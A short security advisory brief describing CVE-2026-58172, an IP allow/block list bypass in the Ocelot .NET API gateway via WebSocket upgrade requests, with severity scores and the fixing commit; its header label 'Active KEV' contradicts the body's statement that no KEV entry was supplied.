SYS::ONLINE
Wasteland.
Briefs1061
Issues17
SinceFeb 2026
LIVE
⚡ Active KEV CVE-2026-58172 2026-06-30

Ocelot API Gateway IP Allow/Block List Bypass via WebSocket Upgrade (CVE-2026-58172)

"A critical security control bypass in the Ocelot API gateway lets denied clients evade IP-based access restrictions by sending WebSocket upgrade requests."

A critical security control bypass in the Ocelot API gateway lets denied clients evade IP-based access restrictions by sending WebSocket upgrade requests.

What Is It

CVE-2026-58172 is a security control bypass (CWE-288, Authentication Bypass Using an Alternate Path) in ThreeMammals' Ocelot, an open-source .NET API gateway. The WebSocket upgrade pipeline branch, configured via MapWhen in OcelotPipelineExtensions.cs, omits SecurityMiddleware. As a result, WebSocket upgrade requests skip enforcement of the configured allow/block list, and traffic from blocked IP addresses is proxied to downstream services. The flaw affects Ocelot through version 24.1.0.

Why It Matters

The vulnerability carries a CVSS 3.1 base score of 9.1 (CRITICAL) with vector AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N; the secondary CVSS 4.0 score is 9.3. It is network-exploitable at low attack complexity, requires no privileges and no user interaction, and yields high confidentiality and integrity impact. Any IP-based access restriction, a core defense for gateways fronting internal services, can be circumvented simply by issuing a WebSocket upgrade request, exposing downstream services that operators believe are shielded.

What's Vulnerable

The supplied data lists no affected CPEs. Deployments that do not configure IP-based allow/block enforcement are outside the scope of this specific bypass.

Patch Status

The issue is fixed in commit f156fd4017ca25025fffdad8ec56c1d657dfb402, which restores security enforcement on the WebSocket upgrade path. Operators should upgrade to a build containing this fix (delivered via pull request #2406). No CISA KEV entry was supplied for this CVE, so there is no confirmation of active exploitation or an associated required-action due date in the provided source material.

Sources